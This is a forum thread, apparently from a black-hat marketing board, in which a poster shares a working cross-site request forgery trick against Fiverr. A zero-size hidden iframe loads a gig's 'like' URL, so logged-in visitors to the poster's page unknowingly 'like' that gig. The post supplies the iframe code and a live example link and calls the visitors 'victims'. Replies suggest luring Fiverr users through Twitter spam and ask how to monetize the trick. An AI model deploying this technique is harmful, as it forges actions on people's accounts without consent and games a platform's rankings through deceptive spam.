Preface: This requires no coding skill whatsoever, you aren't "outed" if they don't have a fiverr account and you won't be "outed" if they do. In other words, it is completely undetectable to your victims that they've just been "forced" to "like" your gig.

Also, this method requires NO USER ACTIONS to work. That means that all they have to do is SIMPLY ARRIVE at a page with the code below on it and they'll "like" your gig. They don't have to click or do anything other than show up.

Backstory: Alright, so I wanted to mess around with Fiverr as it seems to be "all the rage" right now. The site is getting over 200k visitors a month, and it would be nice to get something from that.

So, I made a gig just a couple minutes ago and I immediately realize a problem...the problem that exists with anything venture on the web...getting traffic!

It seems once you get the ball rolling and you get some sales and nice reviews that it isn't that difficult to continue getting traffic, but getting that ball rolling seems like it can be tough.

So after playing around with it for a couple of minutes, I came up with a way to force people to add your gig in their "fiverr bookmarks" (Fiverr.com homepage -> Profile -> Stuff I Like)

What's cool is, not only can you see the "Gigs" that you've "liked" on Fiverr, but so can everybody else that visits your profile page!

Live Working Example: First, go to www.fiverr.com and log into your account and check out the "gigs" you've liked (if any). You can do that by logging in, and mousing over "profile" at the top of the page and then clicking on "Stuff I Like".

Now leave fiverr.com by browsing away from it, go to any other webpage at all. Then, paste this link in your address bar: http://get-stuff-free.info/fiverr/favoriteit.htm

That's it! Simply by visiting that URL you'll be "liking" my fiverr gig! You don't have to click, you don't have to do anything at all...just visit the page.

Method: Your gig will only be "liked" on Fiverr.com using this method if the person arriving at your "special" page

A: Has a fiverr.com account &
B: They have logged into it at some point during their browsing session

Simply go to your gig on Fiverr.com, find your Gig and then mouseover the "like" link (it has a heart next to it). Right click and then click on properties and a window will open up. Copy the URL that appears next to "Address:".

Now, put this code on the URL where your victims will be going:

Code:
<iframe name="I1" src="THE URL YOU JUST COPIED IN THE STEP ABOVE" width="0" height="0" scrolling="no" border="0" frameborder="0">
Your browser does not support inline frames or is currently configured not to display inline frames.
</iframe>

That's it! You're simply having them visit the "like" URL in an iFrame they can't see.

Enjoy!

Sorry if the formatting of the post above is all screwed up (the "Code" part and the links). I can't tell if it is/isn't because I'm still stuck browsing BHW via proxy browsers.

If it is screwed up, you should easily be able to pick out the one line of code you need to put on your site to make this work by viewing the source code at my live example.

A twist of it would be tweetattacks or hummingbird ppl who tweet "fiverr", these have a high probability of having a fiverr account. then you just spam their asses with a 404 with the iframe, by telling THEM you have a way to make them get more traffic to their gigs hahaha; evil.

@referralsecrets -> That's a great idea! Too funny.

"Hey everybody, check out how to get ten million fiver visitors today, just visit this page for the free method" hahahahahaha Good stuff man, good stuff.

yeah..targeting on the keyword fiverr would be great on twitter and buzz!! trying that..lol :D

so from now on i can't be really surprised if i suddenly find a bunch of liked fiverr gigs in my fiverr account what i didn't 'liked' in fact :)
thanks crazyflx :p
btw about this liking thing on fiverr: how much does it affect the ranking of your gig, if it's affect at all? or what's the purpose of doing this? is the traffic "only" coming from people who check what other people liked and it doesn't affect the ranking at all?

@honeybird -> I couldn't tell you to be honest. I literally just joined today and wanted to "play around" with what I could/couldn't do. Maybe some other fiverr vets will have some input on that.

Oh, and your welcome for the mysterious fiverr gigs in your fiverr account ;)

Does anybody actually know about the effects of having tons of people "like" your gig in terms of it's ranking on Fiverr?

I mean, aside from it appearing on people's profile pages and getting traffic that way, does it help your "Gig" move up in it's category's rankings?

I tried it with my own page, but the page I am taking them to is a redirect to another page. Is that what is making it not work for me?

Crazyflx, always thinking outside the box! Nice.

Nice thinking within a Iframe outside of the box crazyflx!

Now how to spin this into something more lucrative lets say, some form of advertisement/offer? :wiggle:
